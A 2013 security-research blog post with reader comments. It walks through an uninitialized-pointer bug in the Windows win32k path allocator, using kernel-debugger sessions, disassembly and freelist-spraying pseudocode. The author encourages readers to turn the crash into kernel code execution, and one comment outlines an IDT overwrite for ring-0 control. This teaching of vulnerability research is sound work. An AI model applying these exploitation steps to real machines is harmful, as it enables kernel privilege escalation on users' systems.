Wednesday, May 15, 2013

Introduction to Windows Kernel Security Research

A few months ago, I mentioned a crash I'd encountered under memory pressure on windows. I was hoping sharing a reproducer might stimulate someone who was interested in learning about kernel debugging to investigate, learning some new skills and possibly getting some insight into researching security issues, potentially getting a head start on discovering their own.

Sadly, I've yet to hear back from anyone who had done any work on it. I think the path subsystem is obscure enough that  it felt too daunting a task for someone new to jump into, and the fact that the reproducer is not reliable might have been scary. I've decided to help get you started, hopefully someone will feel inspired enough to continue. Before reading this post, I assume you're comfortable with kd, IDA Pro and debugging without source code.

First some background, hopefully you're already familiar with GDI basics and understand Pens, Brushes and so on. Paths are basically shapes that can be created by moving between points, they can be straight lines, or irregular and composed of curves, arcs, etc. Internally, a path is stored as a linked list of it's components (points, curves, etc).

The path subsystem is very old (pre-NT?), and uses it's own object allocator called PATHALLOC. PATHALLOC is relatively simple, it's backed (indirectly) by HeavyAllocPool() with the tag 'tapG', but does include it's own simple freelist implementation to reduce calls to HeavyAllocPool.

The PATHALLOC entrypoints are newpathalloc() and freepathalloc(), if you look at the code you'll see it's very simple and easy to understand. Notice that if an allocation cannot be satisfied from the freelist, newpathalloc will always memset zero allocations via PALLOCMEM(), similar to what you might expect from calloc.

However, take a look at the freelist check, if the allocation is satisfied from the freelist, it skips the memset zero. Therefore, it might return allocations that have not been initialized, and callers must be sure to do this themselves.

It turns out, getting an object from the freelist happens quite rarely, so the few cases that don't initialize their path object have survived over 20 years in NT. The case we're going to take a look at is EPATHOBJ::pprFlattenRec().

Hopefully you're familiar with the concept of flattening, the process of translating a bezier curve into a sequence of lines. The details of how this works are not important, just remember that curves are converted into lines.

Flattening a curve, illustration from GraphicsPath MSDN documentation.

EPATHOBJ::pprFlattenRec() is an internal routine for applying this process to a linked list of PATHRECORD objects. If you follow the logic, you can see that the PATHRECORD object retrieved from newpathrec() is mostly initialized, but with one obvious error:

EPATHOBJ::pprFlattenRec(_PATHRECORD *)+33:
.text:BFA122CD                 mov     eax, [esi+PATHRECORD.prev]       ; load old prev
.text:BFA122D0                 push    edi
.text:BFA122D1                 mov     edi, [ebp+new]                   ; get the new PATHRECORD
.text:BFA122D4                 mov     [edi+PATHRECORD.prev], eax       ; copy prev pointer over
.text:BFA122D7                 lea     eax, [edi+PATHRECORD.count]      ; save address of count member
.text:BFA122DA                 xor     edx, edx                         ; set count to zero
.text:BFA122DC                 mov     [eax], edx
.text:BFA122DE                 mov     ecx, [esi+PATHRECORD.flags]      ; load flags
.text:BFA122E1                 and     ecx, 0FFFFFFEFh                  ; clear bezier flag (bezier means divide points by 3 because you need two control points and an ending point).
.text:BFA122E4                 mov     [edi+PATHRECORD.flags], ecx      ; copy old flags over

The next pointer is never initialized! Most of the time you want a new list node to have the next pointer set to NULL, so this works if you don't get your object from the freelist, but otherwise it won't work!

How can we verify this hypothesis? Let's patch newpathrec() to always set the next pointer to a recognisable
value, and see if we can reproduce the crash (Note: I don't use conditional breakpoints because of the performance overhead, if you're using something fancy like virtualkd, it's probably better to use them).

There's a useless assertion in the checked build I don't need, I'll just overwrite the code with mov [pathrec->next], dword 0x41414141, like this (you can use the built in assembler if you want, but I don't like the syntax):

kd> ba e 1 win32k!EPATHOBJ::newpathrec+31
kd> g
Breakpoint 0 hit
96611e9a 83f8ff          cmp     eax,0FFFFFFFFh
kd> eb @eip c7 41 F0 41 41 41 41 90 90 90 90 90 90 90 90 90 90
kd> bc *
kd> g
Access violation - code c0000005 (!!! second chance !!!)
9661252c f6400810        test    byte ptr [eax+8],10h
kd> r
eax=41414141 ebx=9659017e ecx=a173bbec edx=00000001 esi=a173bbec edi=03010034
eip=9661252c esp=a173bbe4 ebp=a173bc28 iopl=0         nv up ei pl nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206
9661252c f6400810        test    byte ptr [eax+8],10h       ds:0023:41414149=??

This looks like convincing evidence that a newpathrec() caller is not initialising new objects correctly. When bFlatten() tried to traverse the linked list of PATHREC objects, it doesn't find the NULL it was expecting.

We know the PATHREC list starts at EPATHOBJ+8, the pointer to the first element is in PATHREC+14, and the next pointer is at +0, so we can look at the chain of PATHREC objects that caused bFlatten() to crash in kd.

  1. The EPATHOBJ is in ecx (Because of the thiscall calling convention).
  2. The PATHREC list starts at poi(ecx+8)
  3. The first element in the list is at poi(poi(ecx+8)+14) (i.e. the head pointer)
  4. The next pointer for the first record will be at +0 in the PATHREC poi(poi(poi(ecx+8)+14))
We can keep adding poi() calls until we find the bad next pointer:

  • this
    • ecx
  • this->pathlist
    • poi(ecx+8)
  • this->pathlist->head
    • poi(poi(ecx+8)+14)
  • this->pathlist->head->next
    • poi(poi(poi(ecx+8)+14))
  • this->pathlist->head->next->next
    • poi(poi(poi(poi(ecx+8)+14)))
  • this->pathlist->head->next->next->next
    • poi(poi(poi(poi(poi(ecx+8)+14))))
  • etc.

Here is the object with the bad next pointer for me:

kd> dd poi(poi(poi(ecx+8)+14))
fe9395a4  ff1fdde5 fe93904c 00000000 00000149
fe9395b4  01a6d0bf 00ec8b39 01a68f40 00ec19f2
fe9395c4  01a64da5 00eba8c0 01a60bee 00eb37a5
fe9395d4  01a5ca1b 00eac69f 01a5882d 00ea55af
fe9395e4  01a54623 00e9e4d5 01a503fd 00e97411
fe9395f4  01a4c1bb 00e90362 01a47f5e 00e892ca
fe939604  01a43ce6 00e82247 01a3fa52 00e7b1da
fe939614  01a3b7a2 00e74183 01a374d7 00e6d142

The standard process for researching this kind of problem is to implement the various primitives we can chain together to get the behaviour we want reliably. These are the building blocks we use to control what's happening.

Conceptually, this is something like:

Primitive 1: Allocate a path object with as much contents controlled as possible.
Primitive 2: Get that path object released and added to the freelist.
Primitive 3: Trigger the bad allocation from the freelist.

Once we have implemented these, we can chain them together to move an EPATHOBJ reliably into userspace, and then we can investigate if it's exploitable. Let's work on this.

Controlling the contents of a PATHREC object

A PATHREC looks something like this:

struct PATHREC {
    VOID              *next;
    VOID              *prev;
    ULONG              flags;
    ULONG              count;       // Number of points in array
    POINTFIX           points[0];   // variable length array

POINTFIX is documented in msdn as "A point structure that consists of {FIX x, y;}.". Let's try adding a large number of points to a path consisting of recognisable values as x,y coordinates with PolyBezierTo() and see if we can find it.

If we break during the bounds checking in newpathrec(), we should be able to dump out the points and see if we hit it.

I wrote some code like this (pseudocode):

    POINT  *Points = calloc(8192, sizeof(POINT));

    while (TRUE) {
        for (i = 0; i < 8192; i++) {
            Points[i].x = 0xDEAD;
            Points[i].y = 0xBEEF;

        PolyBezierTo(Device, Points, 8192 / 3);

And put a breakpoint in newpathrec(), and after some waiting, I see this:

kd> ba e 1 win32k!EPATHOBJ::newpathrec+23 "dd @ecx; gc"
kd> g
fe85814c  000dead0 000beef0 000dead0 000beef0
fe85815c  000dead0 000beef0 000dead0 000beef0
fe85816c  000dead0 000beef0 000dead0 000beef0
fe85817c  000dead0 000beef0 000dead0 000beef0
fe85818c  000dead0 000beef0 000dead0 000beef0
fe85819c  000dead0 000beef0 000dead0 000beef0
fe8581ac  000dead0 000beef0 000dead0 000beef0
fe8581bc  000dead0 000beef0 000dead0 000beef0

This confirms the theory, that this trick can be used to get our blocks on the freelist. I spent some time making this reliable.

Spamming the freelist with our POINTFIX structures

Lets make sure that our paths are full of curves with these points, and then flatten them to resize them (thus reducing the number of points). If it works, just by chance we should start to see the original testcase crashing at recognisable addresses.

GDISRV:AllocateObject failed alloc of 2268 bytes
GDISRV:AllocateObject failed alloc of 2268 bytes
GDISRV:AllocateObject failed alloc of 2268 bytes
Access violation - code c0000005 (!!! second chance !!!)
9661252c f6400810        test    byte ptr [eax+8],10h
kd> r
eax=04141410 ebx=9659017e ecx=8ef67bec edx=00000001 esi=8ef67bec edi=03010034
eip=9661252c esp=8ef67be4 ebp=8ef67c28 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
9661252c f6400810        test    byte ptr [eax+8],10h       ds:0023:04141418=??
kd> kv
ChildEBP RetAddr  Args to Child              
8ef67be4 965901ce 00000001 00000119 fe71cef0 win32k!EPATHOBJ::bFlatten+0x15 (FPO: [0,0,4])
8ef67c28 829e0173 03010034 001cfb48 76f0a364 win32k!NtGdiFlattenPath+0x50 (FPO: [Non-Fpo])
8ef67c28 76f0a364 03010034 001cfb48 76f0a364 nt!KiFastCallEntry+0x163 (FPO: [0,3] TrapFrame @ 8ef67c34)

Success! Now we have at least some control over the address, which is something to work with. You can see in EPATHOBJ::bFlatten() the object is handed over to EPATHOBJ::pprFlattenRec(), which is a good place to start looking to look for exploitation opportunities, possibly turning this into code execution.

You can copy my portable shellcode from my KiTrap0D exploit if you need one, which should work reliably on many different kernels, the source code is available here:

If nobody jumps in, I'll keep adding more notes. Feel free to ask me questions if you get stuck or need a hand!

If you solve the mystery and determine this is a security issue, send me an email and I'll update this post. If you confirm it is exploitable, feel free to send your work to Microsoft if you feel so compelled, if this is your first time researching a potential vulnerability it might be an interesting experience.

Note that Microsoft treat vulnerability researchers with great hostility, and are often very difficult to work with. I would advise only speaking to them under a pseudonym, using tor and anonymous email to protect yourself.


karmaisabastard said...


I would like to read your blog without a horizontal scroll bar.

i am using Firefox 20.0.1



karmaisabastard said...

I upgraded to FireFox 21.0 -- Sorry, still the same problem.



HÃ¥vard Pedersen said...
This comment has been removed by a blog administrator.
Nicolas A. Economou said...

Hi Tavis, nice 0day

A good idea to take control is to use the low part of EBX to write the high part of the PAGE FAULT descriptor located in the IDT.

In your example, you control ECX and EBX is equal to 0x80206014.
I saw that the low part of this pointer ( EBX ) is always 0x14.

So, if the handler of the PAGE FAULT is 0x90919293, the new address will be 0x14919293.

When the next PAGE FAULT ( executed in the context of your process ) be triggered, EIP will be 0x14919293.

If no PAGE FAULTs are triggered in your process context, you can choose another interruption as "INT 4"

Obviously, you have to map memory in this range ( 0x14XXXXXX ) to handle this EXCEPTION and to reach ring0 code execution in USER SPACE ;-)

albina N muro said...
This comment has been removed by a blog administrator.
David Warner said...
This comment has been removed by a blog administrator.
a said...

Hi Tavis,

it's not true no one asked you questions. I asked, but you never answered to my email ;)

So.. keep writting. I'm ready when you're. ;)

Cheers o/